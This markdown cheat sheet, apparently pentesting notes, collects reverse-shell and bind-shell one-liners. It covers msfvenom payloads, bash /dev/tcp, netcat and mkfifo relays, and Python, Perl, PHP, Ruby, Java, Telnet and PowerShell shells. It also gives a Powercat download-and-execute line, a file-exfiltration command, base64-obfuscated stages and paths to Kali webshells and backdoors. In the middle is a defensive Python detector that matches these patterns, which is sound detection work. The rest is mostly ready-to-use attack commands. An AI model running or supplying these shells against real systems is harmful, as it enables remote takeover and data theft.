# Reverse shells

**#msfvenom**

```
#Windows .asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#Windows x64 Arch
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#JSP / Tomcat WAR
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f war > java4444.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4448 -f raw > w4448.jsp

#php
msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=1234 -f raw > shell.php

#binaries

#Staged (small stager, the rest of the payload is sent by the handler)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#Stageless (whole payload in one file; note meterpreter_reverse_tcp with an underscore)
#reverse payloads take LHOST (the listener), not RHOST
msfvenom -p linux/x64/shell_reverse_tcp LHOST=11.11.11.11 LPORT=8080 -f elf > shell.elf
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp
```

**#Revshell piped in bash**

```
1) Encode the payload in base64

echo 'nc -e /bin/bash 192.168.101.160 4444' | base64

bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg==

2) Payload:

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg== | base64 -d | bash

3) Catch the revshell

nc -nvlp 4444
```

**#bash**

```
bash -i >& /dev/tcp/10.10.10.1/4444 0>&1

mknod backpipe p && nc 10.10.10.1 4445 0<backpipe | /bin/bash 1>backpipe

mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 10.10.10.1 4444 >/tmp/f2
```

**#php**

```
php -r '$sock=fsockopen("10.10.10.10",4446);exec("/bin/sh -i <&3 >&3 2>&3");'
```

**#Python**

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

**#Perl**

```
perl -e 'use Socket;$i="10.10.10.10";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

**#ruby**

```
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

**#java**

```
// Groovy syntax (list literal, "as String[]", \$ escaping); Runtime.exec() itself is the plain Java API
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

**#Telnet**

```
rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.10.10 80 0</tmp/p | /bin/sh 1>/tmp/p
```
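A defender-side companion to the one-liners above (the piped-in-bash recipe, the bash, php, perl, ruby and telnet shells), added here and not part of the original notes: a small Python auditor that flags process command lines matching this page's patterns (bash `/dev/tcp` redirection, `nc -e`, mkfifo/mknod relays, interpreter sockets handed to a shell) and decodes the `echo <base64> | base64 -d | bash` stage so the inner payload is inspected as well. The indicator names and the sample command lines are constructed for the example.

```python
import base64
import binascii
import re
# Indicators drawn from this page's one-liners: /dev/tcp redirection, nc -e,
# named-pipe relays through nc/telnet, and interpreter sockets wired to a shell.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "nc_exec": re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh"),
    "fifo_relay": re.compile(r"\b(?:mkfifo|mknod\s+\S+\s+p)\b.*\|\s*(?:nc|telnet)\b"
                             r"|\b(?:nc|telnet)\b.*\|\s*/bin/(?:ba)?sh"),
    "interp_socket_shell": re.compile(r"\b(?:fsockopen|TCPSocket\.open|connect\(S,).*\bexec\b"),
}
# Stage 2 of the "piped in bash" recipe above: echo <base64> | base64 -d | bash
B64_TO_SHELL = re.compile(
    r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")

def decode_piped_base64(cmdline):
    """Return the decoded text of an 'echo <b64> | base64 -d | bash' stage, else None."""
    m = B64_TO_SHELL.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def classify(cmdline):
    """Sorted indicator names for one command line; a base64 stage is decoded and classified too."""
    hits = set()
    inner = decode_piped_base64(cmdline)
    if inner is not None:
        hits.add("base64_to_shell")
        hits.update(classify(inner))  # the encoding must not hide the inner shell
    for name, pattern in INDICATORS.items():
        if pattern.search(cmdline):
            hits.add(name)
    return sorted(hits)

# Constructed sample process command lines, not real telemetry: the first three
# mirror recipes on this page, the last two are benign controls.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.10.10.1/4444 0>&1",
    "echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg== | base64 -d | bash",
    "mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 10.10.10.1 4444 >/tmp/f2",
    "echo aGVsbG8gd29ybGQK | base64 -d | bash",  # decodes to 'hello world'; stage still flagged
    "tar czf /tmp/backup.tgz /var/www",
]

def scan(cmdlines=SAMPLE_CMDLINES):
    # Map each flagged command line to its indicators; clean lines are omitted.
    return {c: h for c in cmdlines if (h := classify(c))}
```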

**#Kali Webshells**

```
Kali PHP reverse shells and command shells:
/usr/share/webshells/php/php-reverse-shell.php  #first love
/usr/share/webshells/php/php-findsock-shell.php
/usr/share/webshells/php/findsock.c
/usr/share/webshells/php/simple-backdoor.php
/usr/share/webshells/php/php-backdoor.php

Kali Perl Reverse Shell
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/perl/perlcmd.cgi

Kali Cold Fusion Shell
/usr/share/webshells/cfm/cfexec.cfm

Kali ASP Shell
/usr/share/webshells/asp/

Kali JSP Reverse Shell
/usr/share/webshells/jsp/jsp-reverse.jsp
```

**#Powershell Reverse shell**

```
Kali: nc -nvlp 443

Windows target:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()"
```

**#Powershell bind shell**

```
Kali: nc -nv 10.11.0.22 443

Windows target, start a powershell listener:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
```

**#Powercat**

```
# install with: apt install powercat
#Default location:/usr/share/windows-resources/powercat
#Transfer powershell script to target or download with:

iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

#Powercat file transfer
Kali: nc -nvlp 443
Windows: powercat -c 10.10.10.10 -p 443 -i C:\Users\Redcliff\important.txt

#Powercat reverse shell
Kali: nc -nvlp 443
Windows: powercat -c 10.10.10.10 -p 443 -e cmd.exe

#Powercat bind shell
Kali: nc 11.11.11.11 443
Windows: powercat -l -p 443 -e cmd.exe

#Powercat standalone payload (Base64 encoded)
Windows: powercat -c 10.10.10.10 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

Then: paste entire encoded string with -E flag
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAH IAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAs ACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAg........

Kali: nc -nvlp 443
```
